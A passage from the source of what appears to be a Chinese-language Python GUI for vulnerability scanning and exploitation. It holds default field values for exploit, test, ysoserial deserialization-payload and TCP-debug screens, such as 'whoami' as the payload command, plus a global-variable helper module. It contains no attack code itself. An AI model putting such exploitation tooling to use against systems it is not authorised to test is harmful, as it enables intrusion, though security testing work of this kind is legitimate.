StringVar(value='ALL')#漏洞利用界面_顶部_调用方法_ALL 46 | Ent_B_Top_funtype = StringVar(value='False')#漏洞利用界面_顶部_exp功能_False 47 | Ent_B_Top_timeout = StringVar(value='5')#漏洞扫描界面_顶部_超时时间_3 48 | Ent_B_Top_retry_time = StringVar(value='1')#漏洞扫描界面_顶部_重试次数_2 49 | Ent_B_Top_retry_interval = StringVar(value='1')#漏洞扫描界面_顶部_重试间隔_2 50 | Ent_B_Bottom_Left_cmd = StringVar()#漏洞利用界面_底部_CMD命令输入框 51 | Ent_B_Bottom_terminal_cmd = StringVar()#漏洞利用界面_终端_CMD命令输入框 52 | 53 | #漏洞测试界面_C 54 | Ent_C_Top_url = StringVar(value='http://httpbin.org')#漏洞测试界面_顶部_目标地址 55 | Ent_C_Top_path = StringVar(value='/ip')#漏洞测试界面_顶部_路径 56 | Ent_C_Top_reqmethod = StringVar(value='GET')#漏洞测试界面_顶部_请求方法类型_GET 57 | Ent_C_Top_vulname = StringVar(value='用作类名, 不能包含空格')#漏洞测试界面_顶部_脚本名称 58 | Ent_C_Top_cmsname = StringVar(value='')#漏洞测试界面_顶部_CMS名称 59 | Ent_C_Top_cvename = StringVar(value='cve_')#漏洞测试界面_顶部_CVE编号 60 | Ent_C_Top_version = StringVar(value='app=\'\'')#漏洞测试界面_顶部_版本信息 61 | Ent_C_Top_info = StringVar(value='命令执行描述')#漏洞测试界面_顶部_info_命令执行描述 62 | Ent_C_Top_template = StringVar(value='请选择模板')#漏洞测试界面_顶部_template_请选择模板 63 | 64 | #测试 65 | Ent_Cmds_Top_type = StringVar()#命令控制台界面_顶部_漏洞类型 66 | Ent_Cmds_Top_typevar = StringVar(value='yy yang haha 1 2 3 4 5 7 8 0')#命令控制台界面_顶部_漏洞类型值 67 | 68 | #反序列化利用界面 69 | Ent_yso_Top_type = StringVar(value='-jar')#ysoserial代码生成界面_顶部_类型 70 | Ent_yso_Top_class = StringVar(value='利用链类')#ysoserial代码生成界面_顶部_利用链类 71 | Ent_yso_Top_cmd = StringVar(value='whoami')#ysoserial代码生成界面_顶部_命令 72 | 73 | #TCP调试界面 74 | TCP_Debug_IP = StringVar(value='127.0.0.1')#TCP调试界面_IP地址 75 | TCP_Debug_PORT = IntVar(value=80)#TCP调试界面_端口 76 | TCP_Debug_PKT_BUFF_SIZE = IntVar(value=2048)#TCP调试界面_接收缓冲区大小 77 | 78 | #其他变量 79 | variable_dict = { 80 | "Proxy_CheckVar1" : Proxy_CheckVar1, 81 | "Proxy_CheckVar2" : Proxy_CheckVar2, 82 | "PROXY_TYPE" : Proxy_type, 83 | "Proxy_addr" : Proxy_addr, 84 | "Proxy_port" : Proxy_port, 85 | "Proxy_page" : Proxy_page, 86 | "Proxy_webtitle" : Proxy_webtitle, 87 | } -------------------------------------------------------------------------------- /util/globalvar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | """ 4 | 全局变量: GlobalVar 5 | """ 6 | def _init(): 7 | global _global_dict 8 | _global_dict = {} 9 | 10 | def set_value(name, value): 11 | _global_dict[name] = value 12 | 13 | def get_value(name, defValue=None): 14 | try: 15 | return _global_dict[name] 16 | except KeyError: 17 | return defValue --------------------------------------------------------------------------------